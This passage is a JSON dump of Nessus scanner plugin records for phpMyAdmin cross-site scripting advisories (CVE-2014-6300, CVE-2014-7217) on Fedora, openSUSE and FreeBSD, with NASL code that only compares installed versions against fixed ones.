phpMyAdmin-4.2.8.1-2.fc20 (2014-10981)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6300"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-10981.NASL", "href": "https://www.tenable.com/plugins/nessus/77872", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10981.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77872);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-6300\");\n script_bugtraq_id(69790);\n script_xref(name:\"FEDORA\", value:\"2014-10981\");\n\n script_name(english:\"Fedora 20 : phpMyAdmin-4.2.8.1-2.fc20 (2014-10981)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.8.1 (2014-09-13) ===============================\n\n - [security] DOM based XSS that results to a CSRF that\n creates a ROOT account in certain conditions\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1141635\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138655.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?601dc179\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"phpMyAdmin-4.2.8.1-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-16T14:10:22", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is 4.0.x prior to 4.0.10.4, 4.1.x prior to 4.1.14.5, or 4.2.x prior to 4.2.9.1. It is, therefore, affected by an input validation error related to the 'ENUM' value and the files 'libraries/TableSearch.class.php' and 'libraries/Util.class.php'. This issue could allow cross-site scripting attacks.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.4 / 4.1.x < 4.1.14.5 / 4.2.x < 4.2.9.1 'ENUM' Value XSS (PMASA-2014-11)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_11.NASL", "href": "https://www.tenable.com/plugins/nessus/78233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78233);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.4 / 4.1.x < 4.1.14.5 / 4.2.x < 4.2.9.1 'ENUM' Value XSS (PMASA-2014-11)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by a\ncross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin\napplication hosted on the remote web server is 4.0.x prior to\n4.0.10.4, 4.1.x prior to 4.1.14.5, or 4.2.x prior to 4.2.9.1. It is,\ntherefore, affected by an input validation error related to the 'ENUM'\nvalue and the files 'libraries/TableSearch.class.php' and\n'libraries/Util.class.php'. This issue could allow cross-site\nscripting attacks.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/c6c77589a5860f20b5fb335033389de50e1a9031\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d26560ae\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/71ccbbc423bcfd14ba40174b3adcd9a0fafaa511\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2a404b70\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/c1a3f85fbd1a9569646e7cf1b791325ae82c7961\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68163849\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/304fb2b645b36a39e03b954fdbd567173ebe6448\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0a07dda\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin 4.0.10.4 / 4.1.14.5 / 4.2.9.1 or later, or apply\nthe patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"phpMyAdmin\";\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:appname, port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, appname, url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, appname, port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, appname + \" 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.4\n# 4.1.x < 4.1.14.5\n# 4.2.x < 4.2.9.1\ncut_off = NULL;\nfixed_ver = NULL;\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = '4.0.0';\n fixed_ver = '4.0.10.4';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.5';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.9.1';\n}\n\n# The following should never happen at this\n# point, but best to be safe and check anyway.\nif (isnull(cut_off) || isnull(fixed_ver))\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:03", "description": "Versions of phpMyAdmin earlier than 4.0.10.4, 4.1.14.5, and 4.2.9.1 are unpatched for cross-site scripting vulnerabilities affecting the table search and table structure pages. These vulnerabilities can be leveraged to steal cookie-based authentication, among other potential attacks, though note that they can only be leveraged by a logged-in user.", "cvss3": {"score": 3.7, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.4 / 4.1.x < 4.1.14.5 / 4.2.x < 4.2.9.1 Multiple XSS (PMASA-2014-11)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8542.PRM", "href": "https://www.tenable.com/plugins/nnm/8542", "sourceData": "Binary data 8542.prm", "cvss": {"score": 4.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:19", "description": "phpMyAdmin was updated fix a security issues [CVE-2014-7217] This update contains a fix for a cross-site scripting vulnerability in the table search and table structure pages which could be trigged with a crafted ENUM value.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1280-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpMyAdmin", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-581.NASL", "href": "https://www.tenable.com/plugins/nessus/78118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-581.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78118);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-7217\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-SU-2014:1280-1)\");\n script_summary(english:\"Check for the openSUSE-2014-581 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin was updated fix a security issues [CVE-2014-7217] This\nupdate contains a fix for a cross-site scripting vulnerability in the\ntable search and table structure pages which could be trigged with a\ncrafted ENUM value.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=899452\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-10/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"phpMyAdmin-4.1.14.5-1.24.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"phpMyAdmin-4.1.14.5-16.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:33", "description": "The phpMyAdmin development team reports :\n\nWith a crafted ENUM value it is possible to trigger an XSS in table search and table structure pages. This vulnerability can be triggered only by someone who is logged in to phpMyAdmin, as the usual token protection prevents non-logged-in users from accessing the required pages.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "FreeBSD : phpMyAdmin -- XSS vulnerabilities (3e8b7f8a-49b0-11e4-b711-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpMyAdmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3E8B7F8A49B011E4B7116805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/78015", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78015);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-7217\");\n\n script_name(english:\"FreeBSD : phpMyAdmin -- XSS vulnerabilities (3e8b7f8a-49b0-11e4-b711-6805ca0b3d42)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nWith a crafted ENUM value it is possible to trigger an XSS in table\nsearch and table structure pages. This vulnerability can be triggered\nonly by someone who is logged in to phpMyAdmin, as the usual token\nprotection prevents non-logged-in users from accessing the required\npages.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2014-11.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2014-11/\"\n );\n # https://vuxml.freebsd.org/freebsd/3e8b7f8a-49b0-11e4-b711-6805ca0b3d42.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec91c838\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin>=4.2.0<4.2.9.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:pkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:15", "description": "phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table structure pages\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Fedora 21 : phpMyAdmin-4.2.9.1-1.fc21 (2014-11978)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-11978.NASL", "href": "https://www.tenable.com/plugins/nessus/78101", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11978.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78101);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_xref(name:\"FEDORA\", value:\"2014-11978\");\n\n script_name(english:\"Fedora 21 : phpMyAdmin-4.2.9.1-1.fc21 (2014-11978)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table\n structure pages\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1148664\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140170.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f77b7415\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"phpMyAdmin-4.2.9.1-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:06", "description": "phpMyAdmin 4.2.9.1 (2014-10-01) ===============================\n\n - [security] XSS vulnerabilities in table search and table structure pages\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Fedora 19 : phpMyAdmin-4.2.9.1-1.fc19 (2014-11983)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7217"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11983.NASL", "href": "https://www.tenable.com/plugins/nessus/78374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11983.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78374);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-7217\");\n script_bugtraq_id(70252);\n script_xref(name:\"FEDORA\", value:\"2014-11983\");\n\n script_name(english:\"Fedora 19 : phpMyAdmin-4.2.9.1-1.fc19 (2014-11983)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n 